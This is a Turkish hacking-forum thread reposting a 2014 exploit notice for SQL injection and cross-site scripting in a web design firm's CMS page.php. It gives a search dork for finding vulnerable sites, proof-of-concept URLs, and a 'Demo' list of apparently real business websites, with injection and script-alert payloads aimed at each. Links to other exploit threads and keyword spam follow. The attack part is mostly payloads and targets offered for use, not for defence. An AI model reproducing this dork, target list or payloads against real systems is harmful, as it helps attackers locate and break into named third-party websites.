Konuyu Oyla:
  • Derecelendirme: 4/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Bug: Design Foundry Cross Site Scripting / SQL Injection
#1
PHP Kod:
[+] TitleFoundry CMS Multiple Vulnerability
[+] Date2014/07/20
[+] AuthorHekt0r
[+] Vendor Homepagewww.design-foundry.co.uk
[+] Tested onWindows 7 Kali Linux
[+] Vulnerable Files: /page.php
[+} Dork intext:"Site by The Design Foundry"
### POC:
[+] Sql Injectionhttp://site/page.php?id=[SQL-Injection]
[+] XSShttp://site/page.php?id=[XSS]
### Demo:
[+] Sql injectionhttp://www.reXsonatehub.co.uk/page.php?id=1'
http://www.sutcXliffe.co.uk/page.php?id=1'
http://www.warmXerenergyservices.com/page.php?id=25'
http://www.my-Xmaintenance.com/page.php?id=1'
[+] Xsshttp://www.resonatXehub.co.uk/page.php?id=
<script>alert(/xss/)</script>
http://www.sutcliffe.co.uk/page.php?id=
<script>alert(/xss/)</script>
http://www.warmerenergyservices.com/page.php?id=
<script>alert(/xss/)</script>
http://www.my-maintenance.com/page.php?id=
<script>alert(/xss/)</script>
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire,Ali Ahmady Saeed.Jok3r,
M4hdi,
ALIREZA_PROMIS And All members of Iran Security Group
[+] iransec.net 
Beğenenler:
#2
Saol exciting
Beğenenler:
#3
(22-07-2014, Saat: 15:39)xR4TC Adlı Kullanıcıdan Alıntı: Saol exciting

rica
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress U-Design Rasgele Dosya İndirme ve Shell Yükleme Açığı KingSkrupellos 7 129 21-11-2016, Saat: 23:10
Son Yorum: Efetimi
  F3 Design SQL Enjeksiyon Açığı KingSkrupellos 3 62 06-11-2016, Saat: 21:51
Son Yorum: Dessy
  Design By X’son SQL Enjeksiyon Güvenlik Açığı KingSkrupellos 2 59 05-11-2016, Saat: 23:04
Son Yorum: Efetimi
  PhpLinks Cross Site Scripting Vulnerability archavin 39 286,317 30-10-2016, Saat: 12:35
Son Yorum: JoseQual
  Hemshub Design World CMS Yönetici Atlatma Açığı Dark-Capar 6 231 24-10-2016, Saat: 13:02
Son Yorum: Efetimi
Anahtar Kelimeler

Bug: Design Foundry Cross Site Scripting / SQL Injection indir, Bug: Design Foundry Cross Site Scripting / SQL Injection Videosu, Bug: Design Foundry Cross Site Scripting / SQL Injection Online izle, Bug: Design Foundry Cross Site Scripting / SQL Injection Bedava indir, Bug: Design Foundry Cross Site Scripting / SQL Injection Yükle, Bug: Design Foundry Cross Site Scripting / SQL Injection Hakkında, Bug: Design Foundry Cross Site Scripting / SQL Injection Nedir, Bug: Design Foundry Cross Site Scripting / SQL Injection Free indir, Bug: Design Foundry Cross Site Scripting / SQL Injection Oyunu, Bug: Design Foundry Cross Site Scripting / SQL Injection Download


1 Ziyaretçi